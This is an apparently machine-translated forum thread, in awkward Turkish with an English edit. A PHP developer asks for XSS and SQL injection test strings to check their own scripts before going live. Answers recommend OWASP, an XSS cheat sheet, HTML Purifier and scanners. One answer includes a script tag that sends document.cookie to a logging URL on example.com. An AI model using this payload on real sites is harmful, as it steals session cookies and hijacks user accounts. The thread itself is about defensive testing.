Birisi bana bazı temel XSS ve SQL injection komut verebilir misiniz?

7 Cevap php

Ben onlar XSS ve SQL enjeksiyonu önlemek eğer görmek için benim komut dışarı test ediyorum. Birisi benim programların içine "hack" edecek bazı temel ama iyi programlarda bana sağlayabilir. Ben online gitmeden önce benim komut test etmek istiyorum.

EDIT: Thank you all for those links, they contain loads and loads of information. But for a beginner to security, is there a recommended site that's? I'm not sure if I am ready to dive straight into in-dept security issues. I like the links waiwai933 recommended.

7 Cevap

Herkes sağlayabilir ki her durum farklı alfabeler gerektirir, bu nedenle orada hiçbir "tek beden herkese uyar '. Eğer sitenin güvenli olduğundan emin olmak için önce test edilmesi gerekir komut listesi binlerce gider.

Eğer SQL enjeksiyon test etmek için izin Firefox ya da Chrome eklentileri kontrol etmek isteyebilirsiniz. Bu bir tavsiye, ama siz de başkaları için bakmak isteyebilirsiniz: https://addons.mozilla.org/en-US/firefox/addon/6727. Ne yapar bu muhtemelen bunu etkinleştirmek kez, bu komut ile sitenizi bombalayan ve güvenlik açıkları nerede görelim sonra varsayılan bir kaç sağlar ve enjeksiyon komut listesini sunmak için izin vermesidir.

Ben bazı örnek XSS komut için bu siteyi öneririm: http://ha.ckers.org/xss.html

At XSS Klavuzu http://ha.ckers.org/xss.html XSS testleri iyi bir koleksiyon. Gerçi, kendi XSS denetimi uygulanması tavsiye etmem; (muhtemelen Klavuzu içinde bazı örnekler görünce gerçekleştirecek gibi) SQL enjeksiyonları tespit çok daha zor. Sadece katı yöntem kodu ayrıştırmak ondan bir DOM ağacı oluşturmak ve geri HTML O ağaca dönüştürmek olduğunu ve bir sürü iş olduğunu ve diğer insanların zaten yaptık. Gibi bir şey kullanın HTML Purifier.

Googe yeni jarslberg öğretim sitesi nasıl yazmak ve XSS ve diğer bazı güvenlik saldırılarına karşı savunmak için size öğretmek için büyük bir kaynaktır.

Sevecen ve sormak için yeterince bilmek için +1. Eğer güvenlik soruları soruyoruz beri ben zaten aşina değilseniz OWASP web sitesi tavsiye etmek istiyorum. Sen sordunuz ne üzerinde ve yukarıda her türlü bilgi bulabilirsiniz., Her türlü saldırıyı önlemeye ilişkin bilgi ton bahsetmiyorum. Sitesi web geliştiricileri için paha biçilmez bir araçtır.

http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project

Ben bazı büyük sonuçlar için bu aracı kullandık.

Tarayıcılar tarafından bloke almaz ve strip_tags() Aşağıdaki kodu yoksa kolay olabilir en basit olanıdır:

<script>(new Image).src = 'http://example.com/logSessions.php?s=' + document.cookie;</script>

Sen Acunetix Security Scanner, varsayılan olarak sadece XSS ve MySQL enjeksiyon için tarama ancak bu bile patlatır diğer tür için olmayacak ile deneyebilirsiniz. Program pratik bir tarayıcı öykünür ve bir kullanıcı oturum açmış gibi davranabilir.

etiketler